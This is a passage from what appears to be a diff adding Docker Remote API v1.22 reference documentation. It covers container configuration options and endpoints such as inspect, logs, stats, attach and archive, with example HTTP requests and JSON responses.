+             _absolute_ path.
+           + `volume-name:container-dest:ro` to mount the volume read-only
+             inside the container.  `container-dest` must be an _absolute_ path.
+    -   **Tmpfs** – A map of container directories which should be replaced by tmpfs mounts, and their corresponding
+          mount options. A JSON object in the form `{ "/run": "rw,noexec,nosuid,size=65536k" }`.
+    -   **Links** - A list of links for the container. Each link entry should be
+          in the form of `container_name:alias`.
+    -   **Memory** - Memory limit in bytes.
+    -   **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap.
+          You must use this with `memory` and make the swap value larger than `memory`.
+    -   **MemoryReservation** - Memory soft limit in bytes.
+    -   **KernelMemory** - Kernel memory limit in bytes.
+    -   **CpuShares** - An integer value containing the container's CPU Shares
+          (ie. the relative weight vs other containers).
+    -   **CpuPeriod** - The length of a CPU period in microseconds.
+    -   **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period.
+    -   **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use.
+    -   **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems.
+    -   **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000.
+    -   **BlkioWeightDevice** - Block IO weight (relative device weight) in the form of:        `"BlkioWeightDevice": [{"Path": "device_path", "Weight": weight}]`
+    -   **BlkioDeviceReadBps** - Limit read rate (bytes per second) from a device in the form of:	`"BlkioDeviceReadBps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceReadBps": [{"Path": "/dev/sda", "Rate": "1024"}]"`
+    -   **BlkioDeviceWriteBps** - Limit write rate (bytes per second) to a device in the form of:	`"BlkioDeviceWriteBps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]"`
+    -   **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of:	`"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
+    -   **BlkioDeviceWiiteIOps** - Limit write rate (IO per second) to a device in the form of:	`"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example:
+        `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]`
+    -   **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100.
+    -   **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not.
+    -   **OomScoreAdj** - An integer value containing the score given to the container in order to tune OOM killer preferences.
+    -   **PidMode** - Set the PID (Process) Namespace mode for the container;
+          `"container:<name|id>"`: joins another container's PID namespace
+          `"host"`: use the host's PID namespace inside the container
+    -   **PortBindings** - A map of exposed container ports and the host port they
+          should map to. A JSON object in the form
+          `{ <port>/<protocol>: [{ "HostPort": "<port>" }] }`
+          Take note that `port` is specified as a string and not an integer value.
+    -   **PublishAllPorts** - Allocates a random host port for all of a container's
+          exposed ports. Specified as a boolean value.
+    -   **Privileged** - Gives the container full access to the host. Specified as
+          a boolean value.
+    -   **ReadonlyRootfs** - Mount the container's root filesystem as read only.
+          Specified as a boolean value.
+    -   **Dns** - A list of DNS servers for the container to use.
+    -   **DnsOptions** - A list of DNS options
+    -   **DnsSearch** - A list of DNS search domains
+    -   **ExtraHosts** - A list of hostnames/IP mappings to add to the
+        container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`.
+    -   **VolumesFrom** - A list of volumes to inherit from another container.
+          Specified in the form `<container name>[:<ro|rw>]`
+    -   **CapAdd** - A list of kernel capabilities to add to the container.
+    -   **Capdrop** - A list of kernel capabilities to drop from the container.
+    -   **GroupAdd** - A list of additional groups that the container process will run as
+    -   **RestartPolicy** – The behavior to apply when the container exits.  The
+            value is an object with a `Name` property of either `"always"` to
+            always restart, `"unless-stopped"` to restart always except when
+            user has manually stopped the container or `"on-failure"` to restart only when the container
+            exit code is non-zero.  If `on-failure` is used, `MaximumRetryCount`
+            controls the number of times to retry before giving up.
+            The default is not to restart. (optional)
+            An ever increasing delay (double the previous delay, starting at 100mS)
+            is added before each restart to prevent flooding the server.
+    -   **NetworkMode** - Sets the networking mode for the container. Supported
+          standard values are: `bridge`, `host`, `none`, and `container:<name|id>`. Any other value is taken
+          as a custom network's name to which this container should connect to.
+    -   **Devices** - A list of devices to add to the container specified as a JSON object in the
+      form
+          `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}`
+    -   **Ulimits** - A list of ulimits to set in the container, specified as
+          `{ "Name": <name>, "Soft": <soft limit>, "Hard": <hard limit> }`, for example:
+          `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }`
+    -   **SecurityOpt**: A list of string values to customize labels for MLS
+        systems, such as SELinux.
+    -   **LogConfig** - Log configuration for the container, specified as a JSON object in the form
+          `{ "Type": "<driver_name>", "Config": {"key1": "val1"}}`.
+          Available types: `json-file`, `syslog`, `journald`, `gelf`, `awslogs`, `splunk`, `none`.
+          `json-file` logging driver.
+    -   **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist.
+    -   **VolumeDriver** - Driver that this container users to mount volumes.
+    -   **ShmSize** - Size of `/dev/shm` in bytes. The size must be greater than 0.  If omitted the system uses 64MB.
+
+**Query parameters**:
+
+-   **name** – Assign the specified name to the container. Must
+    match `/?[a-zA-Z0-9_-]+`.
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **406** – impossible to attach (container not running)
+-   **409** – conflict
+-   **500** – server error
+
+#### Inspect a container
+
+`GET /containers/(id or name)/json`
+
+Return low-level information on the container `id`
+
+**Example request**:
+
+      GET /v1.22/containers/4fa6e0f0c678/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+	{
+		"AppArmorProfile": "",
+		"Args": [
+			"-c",
+			"exit 9"
+		],
+		"Config": {
+			"AttachStderr": true,
+			"AttachStdin": false,
+			"AttachStdout": true,
+			"Cmd": [
+				"/bin/sh",
+				"-c",
+				"exit 9"
+			],
+			"Domainname": "",
+			"Entrypoint": null,
+			"Env": [
+				"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+			],
+			"ExposedPorts": null,
+			"Hostname": "ba033ac44011",
+			"Image": "ubuntu",
+			"Labels": {
+				"com.example.vendor": "Acme",
+				"com.example.license": "GPL",
+				"com.example.version": "1.0"
+			},
+			"MacAddress": "",
+			"NetworkDisabled": false,
+			"OnBuild": null,
+			"OpenStdin": false,
+			"StdinOnce": false,
+			"Tty": false,
+			"User": "",
+			"Volumes": {
+				"/volumes/data": {}
+			},
+			"WorkingDir": "",
+			"StopSignal": "SIGTERM"
+		},
+		"Created": "2015-01-06T15:47:31.485331387Z",
+		"Driver": "devicemapper",
+		"ExecIDs": null,
+		"HostConfig": {
+			"Binds": null,
+			"BlkioWeight": 0,
+			"BlkioWeightDevice": [{}],
+			"BlkioDeviceReadBps": [{}],
+			"BlkioDeviceWriteBps": [{}],
+			"BlkioDeviceReadIOps": [{}],
+			"BlkioDeviceWriteIOps": [{}],
+			"CapAdd": null,
+			"CapDrop": null,
+			"ContainerIDFile": "",
+			"CpusetCpus": "",
+			"CpusetMems": "",
+			"CpuShares": 0,
+			"CpuPeriod": 100000,
+			"Devices": [],
+			"Dns": null,
+			"DnsOptions": null,
+			"DnsSearch": null,
+			"ExtraHosts": null,
+			"IpcMode": "",
+			"Links": null,
+			"LxcConf": [],
+			"Memory": 0,
+			"MemorySwap": 0,
+			"MemoryReservation": 0,
+			"KernelMemory": 0,
+			"OomKillDisable": false,
+			"OomScoreAdj": 500,
+			"NetworkMode": "bridge",
+			"PidMode": "",
+			"PortBindings": {},
+			"Privileged": false,
+			"ReadonlyRootfs": false,
+			"PublishAllPorts": false,
+			"RestartPolicy": {
+				"MaximumRetryCount": 2,
+				"Name": "on-failure"
+			},
+			"LogConfig": {
+				"Config": null,
+				"Type": "json-file"
+			},
+			"SecurityOpt": null,
+			"VolumesFrom": null,
+			"Ulimits": [{}],
+			"VolumeDriver": "",
+			"ShmSize": 67108864
+		},
+		"HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname",
+		"HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts",
+		"LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log",
+		"Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39",
+		"Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2",
+		"MountLabel": "",
+		"Name": "/boring_euclid",
+		"NetworkSettings": {
+			"Bridge": "",
+			"SandboxID": "",
+			"HairpinMode": false,
+			"LinkLocalIPv6Address": "",
+			"LinkLocalIPv6PrefixLen": 0,
+			"Ports": null,
+			"SandboxKey": "",
+			"SecondaryIPAddresses": null,
+			"SecondaryIPv6Addresses": null,
+			"EndpointID": "",
+			"Gateway": "",
+			"GlobalIPv6Address": "",
+			"GlobalIPv6PrefixLen": 0,
+			"IPAddress": "",
+			"IPPrefixLen": 0,
+			"IPv6Gateway": "",
+			"MacAddress": "",
+			"Networks": {
+				"bridge": {
+					"NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812",
+					"EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d",
+					"Gateway": "172.17.0.1",
+					"IPAddress": "172.17.0.2",
+					"IPPrefixLen": 16,
+					"IPv6Gateway": "",
+					"GlobalIPv6Address": "",
+					"GlobalIPv6PrefixLen": 0,
+					"MacAddress": "02:42:ac:12:00:02"
+				}
+			}
+		},
+		"Path": "/bin/sh",
+		"ProcessLabel": "",
+		"ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf",
+		"RestartCount": 1,
+		"State": {
+			"Error": "",
+			"ExitCode": 9,
+			"FinishedAt": "2015-01-06T15:47:32.080254511Z",
+			"OOMKilled": false,
+			"Dead": false,
+			"Paused": false,
+			"Pid": 0,
+			"Restarting": false,
+			"Running": true,
+			"StartedAt": "2015-01-06T15:47:32.072697474Z",
+			"Status": "running"
+		},
+		"Mounts": [
+			{
+				"Name": "fac362...80535",
+				"Source": "/data",
+				"Destination": "/data",
+				"Driver": "local",
+				"Mode": "ro,Z",
+				"RW": false,
+				"Propagation": ""
+			}
+		]
+	}
+
+**Example request, with size information**:
+
+    GET /v1.22/containers/4fa6e0f0c678/json?size=1 HTTP/1.1
+
+**Example response, with size information**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+    ....
+    "SizeRw": 0,
+    "SizeRootFs": 972,
+    ....
+    }
+
+**Query parameters**:
+
+-   **size** – 1/True/true or 0/False/false, return container size information. Default is `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### List processes running inside a container
+
+`GET /containers/(id or name)/top`
+
+List processes running inside the container `id`. On Unix systems this
+is done by running the `ps` command. This endpoint is not
+supported on Windows.
+
+**Example request**:
+
+    GET /v1.22/containers/4fa6e0f0c678/top HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Titles" : [
+         "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD"
+       ],
+       "Processes" : [
+         [
+           "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash"
+         ],
+         [
+           "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10"
+         ]
+       ]
+    }
+
+**Example request**:
+
+    GET /v1.22/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+      "Titles" : [
+        "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND"
+      ]
+      "Processes" : [
+        [
+          "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash"
+        ],
+        [
+          "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10"
+        ]
+      ],
+    }
+
+**Query parameters**:
+
+-   **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef`
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container logs
+
+`GET /containers/(id or name)/logs`
+
+Get `stdout` and `stderr` logs from the container ``id``
+
+> **Note**:
+> This endpoint works only for containers with the `json-file` or `journald` logging drivers.
+
+**Example request**:
+
+     GET /v1.22/containers/4fa6e0f0c678/logs?stderr=1&stdout=1&timestamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1
+
+**Example response**:
+
+     HTTP/1.1 101 UPGRADED
+     Content-Type: application/vnd.docker.raw-stream
+     Connection: Upgrade
+     Upgrade: tcp
+
+     {% raw %}
+     {{ STREAM }}
+     {% endraw %}
+
+**Query parameters**:
+
+-   **follow** – 1/True/true or 0/False/false, return stream. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`.
+-   **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp
+    will only output log-entries since that timestamp. Default: 0 (unfiltered)
+-   **timestamps** – 1/True/true or 0/False/false, print timestamps for
+        every log line. Default `false`.
+-   **tail** – Output specified number of lines at the end of logs: `all` or `<number>`. Default all.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **404** – no such container
+-   **500** – server error
+
+#### Inspect changes on a container's filesystem
+
+`GET /containers/(id or name)/changes`
+
+Inspect changes on container `id`'s filesystem
+
+**Example request**:
+
+    GET /v1.22/containers/4fa6e0f0c678/changes HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+         {
+                 "Path": "/dev",
+                 "Kind": 0
+         },
+         {
+                 "Path": "/dev/kmsg",
+                 "Kind": 1
+         },
+         {
+                 "Path": "/test",
+                 "Kind": 1
+         }
+    ]
+
+Values for `Kind`:
+
+- `0`: Modify
+- `1`: Add
+- `2`: Delete
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Export a container
+
+`GET /containers/(id or name)/export`
+
+Export the contents of container `id`
+
+**Example request**:
+
+    GET /v1.22/containers/4fa6e0f0c678/export HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/octet-stream
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container stats based on resource usage
+
+`GET /containers/(id or name)/stats`
+
+This endpoint returns a live stream of a container's resource usage statistics.
+
+**Example request**:
+
+    GET /v1.22/containers/redis1/stats HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Type: application/json
+
+      {
+         "read" : "2015-01-08T22:57:31.547920715Z",
+         "networks": {
+                 "eth0": {
+                     "rx_bytes": 5338,
+                     "rx_dropped": 0,
+                     "rx_errors": 0,
+                     "rx_packets": 36,
+                     "tx_bytes": 648,
+                     "tx_dropped": 0,
+                     "tx_errors": 0,
+                     "tx_packets": 8
+                 },
+                 "eth5": {
+                     "rx_bytes": 4641,
+                     "rx_dropped": 0,
+                     "rx_errors": 0,
+                     "rx_packets": 26,
+                     "tx_bytes": 690,
+                     "tx_dropped": 0,
+                     "tx_errors": 0,
+                     "tx_packets": 9
+                 }
+         },
+         "memory_stats" : {
+            "stats" : {
+               "total_pgmajfault" : 0,
+               "cache" : 0,
+               "mapped_file" : 0,
+               "total_inactive_file" : 0,
+               "pgpgout" : 414,
+               "rss" : 6537216,
+               "total_mapped_file" : 0,
+               "writeback" : 0,
+               "unevictable" : 0,
+               "pgpgin" : 477,
+               "total_unevictable" : 0,
+               "pgmajfault" : 0,
+               "total_rss" : 6537216,
+               "total_rss_huge" : 6291456,
+               "total_writeback" : 0,
+               "total_inactive_anon" : 0,
+               "rss_huge" : 6291456,
+               "hierarchical_memory_limit" : 67108864,
+               "total_pgfault" : 964,
+               "total_active_file" : 0,
+               "active_anon" : 6537216,
+               "total_active_anon" : 6537216,
+               "total_pgpgout" : 414,
+               "total_cache" : 0,
+               "inactive_anon" : 0,
+               "active_file" : 0,
+               "pgfault" : 964,
+               "inactive_file" : 0,
+               "total_pgpgin" : 477
+            },
+            "max_usage" : 6651904,
+            "usage" : 6537216,
+            "failcnt" : 0,
+            "limit" : 67108864
+         },
+         "blkio_stats" : {},
+         "cpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24472255,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100215355,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 739306590000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         },
+         "precpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  8646879,
+                  24350896,
+                  36438778,
+                  30657443
+               ],
+               "usage_in_usermode" : 50000000,
+               "total_usage" : 100093996,
+               "usage_in_kernelmode" : 30000000
+            },
+            "system_cpu_usage" : 9492140000000,
+            "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0}
+         }
+      }
+
+The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field.
+
+**Query parameters**:
+
+-   **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Resize a container TTY
+
+`POST /containers/(id or name)/resize`
+
+Resize the TTY for container with  `id`. The unit is number of characters. You must restart the container for the resize to take effect.
+
+**Example request**:
+
+      POST /v1.22/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Length: 0
+      Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – No such container
+-   **500** – Cannot resize container
+
+#### Start a container
+
+`POST /containers/(id or name)/start`
+
+Start the container `id`
+
+> **Note**:
+> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body.
+> See [create a container](#create-a-container) for details.
+
+**Example request**:
+
+    POST /v1.22/containers/e90e34656806/start HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **detachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already started
+-   **404** – no such container
+-   **500** – server error
+
+#### Stop a container
+
+`POST /containers/(id or name)/stop`
+
+Stop the container `id`
+
+**Example request**:
+
+    POST /v1.22/containers/e90e34656806/stop?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already stopped
+-   **404** – no such container
+-   **500** – server error
+
+#### Restart a container
+
+`POST /containers/(id or name)/restart`
+
+Restart the container `id`
+
+**Example request**:
+
+    POST /v1.22/containers/e90e34656806/restart?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Kill a container
+
+`POST /containers/(id or name)/kill`
+
+Kill the container `id`
+
+**Example request**:
+
+    POST /v1.22/containers/e90e34656806/kill HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **signal** - Signal to send to the container: integer or string like `SIGINT`.
+        When not set, `SIGKILL` is assumed and the call waits for the container to exit.
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Update a container
+
+`POST /containers/(id or name)/update`
+
+Update resource configs of one or more containers.
+
+**Example request**:
+
+       POST /v1.22/containers/e90e34656806/update HTTP/1.1
+       Content-Type: application/json
+
+       {
+         "BlkioWeight": 300,
+         "CpuShares": 512,
+         "CpuPeriod": 100000,
+         "CpuQuota": 50000,
+         "CpusetCpus": "0,1",
+         "CpusetMems": "0",
+         "Memory": 314572800,
+         "MemorySwap": 514288000,
+         "MemoryReservation": 209715200,
+         "KernelMemory": 52428800,
+       }
+
+**Example response**:
+
+       HTTP/1.1 200 OK
+       Content-Type: application/json
+
+       {
+           "Warnings": []
+       }
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+#### Rename a container
+
+`POST /containers/(id or name)/rename`
+
+Rename the container `id` to a `new_name`
+
+**Example request**:
+
+    POST /v1.22/containers/e90e34656806/rename?name=new_name HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **name** – new name for the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **409** - conflict name already assigned
+-   **500** – server error
+
+#### Pause a container
+
+`POST /containers/(id or name)/pause`
+
+Pause the container `id`
+
+**Example request**:
+
+    POST /v1.22/containers/e90e34656806/pause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Unpause a container
+
+`POST /containers/(id or name)/unpause`
+
+Unpause the container `id`
+
+**Example request**:
+
+    POST /v1.22/containers/e90e34656806/unpause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Attach to a container
+
+`POST /containers/(id or name)/attach`
+
+Attach to the container `id`
+
+**Example request**:
+
+    POST /v1.22/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 101 UPGRADED
+    Content-Type: application/vnd.docker.raw-stream
+    Connection: Upgrade
+    Upgrade: tcp
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **detachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **400** – bad parameter
+-   **404** – no such container
+-   **409** - container is paused
+-   **500** – server error
+
+**Stream details**:
+
+When using the TTY setting is enabled in
+[`POST /containers/create`
+](#create-a-container),
+the stream is the raw data from the process PTY and client's `stdin`.
+When the TTY is disabled, then the stream is multiplexed to separate
+`stdout` and `stderr`.
+
+The format is a **Header** and a **Payload** (frame).
+
+**HEADER**
+
+The header contains the information which the stream writes (`stdout` or
+`stderr`). It also contains the size of the associated frame encoded in the
+last four bytes (`uint32`).
+
+It is encoded on the first eight bytes like this:
+
+    header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}
+
+`STREAM_TYPE` can be:
+
+-   0: `stdin` (is written on `stdout`)
+-   1: `stdout`
+-   2: `stderr`
+
+`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of
+the `uint32` size encoded as big endian.
+
+**PAYLOAD**
+
+The payload is the raw stream.
+
+**IMPLEMENTATION**
+
+The simplest way to implement the Attach protocol is the following:
+
+    1.  Read eight bytes.
+    2.  Choose `stdout` or `stderr` depending on the first byte.
+    3.  Extract the frame size from the last four bytes.
+    4.  Read the extracted size and output it on the correct output.
+    5.  Goto 1.
+
+#### Attach to a container (websocket)
+
+`GET /containers/(id or name)/attach/ws`
+
+Attach to the container `id` via websocket
+
+Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455)
+
+**Example request**
+
+    GET /v1.22/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
+
+**Example response**
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **detachKeys** – Override the key sequence for detaching a
+        container. Format is a single character `[a-Z]` or `ctrl-<value>`
+        where `<value>` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`.
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+#### Wait a container
+
+`POST /containers/(id or name)/wait`
+
+Block until container `id` stops, then returns the exit code
+
+**Example request**:
+
+    POST /v1.22/containers/16253994b7c4/wait HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"StatusCode": 0}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Remove a container
+
+`DELETE /containers/(id or name)`
+
+Remove the container `id` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.22/containers/16253994b7c4?v=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **v** – 1/True/true or 0/False/false, Remove the volumes
+        associated to the container. Default `false`.
+-   **force** - 1/True/true or 0/False/false, Kill then remove the container.
+        Default `false`.
+
+**Status codes**:
+
+-   **204** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **409** – conflict
+-   **500** – server error
+
+#### Copy files or folders from a container
+
+`POST /containers/(id or name)/copy`
+
+Copy files or folders of container `id`
+
+**Deprecated** in favor of the `archive` endpoint below.
+
+**Example request**:
+
+    POST /v1.22/containers/4fa6e0f0c678/copy HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Resource": "test.txt"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Retrieving information about files and folders in a container
+
+`HEAD /containers/(id or name)/archive`
+
+See the description of the `X-Docker-Container-Path-Stat` header in the
+following section.
+
+#### Get an archive of a filesystem resource in a container
+
+`GET /containers/(id or name)/archive`
+
+Get a tar archive of a resource in the filesystem of container `id`.
+
+**Query parameters**:
+
+- **path** - resource in the container's filesystem to archive. Required.
+
+    If not an absolute path, it is relative to the container's root directory.
+    The resource specified by **path** must exist. To assert that the resource
+    is expected to be a directory, **path** should end in `/` or  `/.`
+    (assuming a path separator of `/`). If **path** ends in `/.` then this
+    indicates that only the contents of the **path** directory should be
+    copied. A symlink is always resolved to its target.
+
+    > **Note**: It is not possible to copy certain system files such as resources
+    > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the
+    > container.
+
+**Example request**:
+
+    GET /v1.22/containers/8cce319429b2/archive?path=/root HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+    X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0=
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+On success, a response header `X-Docker-Container-Path-Stat` will be set to a
+base64-encoded JSON object containing some filesystem header information about
+the archived resource. The above example value would decode to the following
+JSON object (whitespace added for readability):
+
+```json
+{
+    "name": "root",
+    "size": 4096,
+    "mode": 2147484096,
+    "mtime": "2014-02-27T20:51:23Z",
+    "linkTarget": ""
+}
+```
+
+A `HEAD` request can also be made to this endpoint if only this information is
+desired.
+
+**Status codes**:
+
+- **200** - success, returns archive of copied resource
+- **400** - client error, bad parameter, details in JSON response body, one of:
+    - must specify path parameter (**path** cannot be empty)
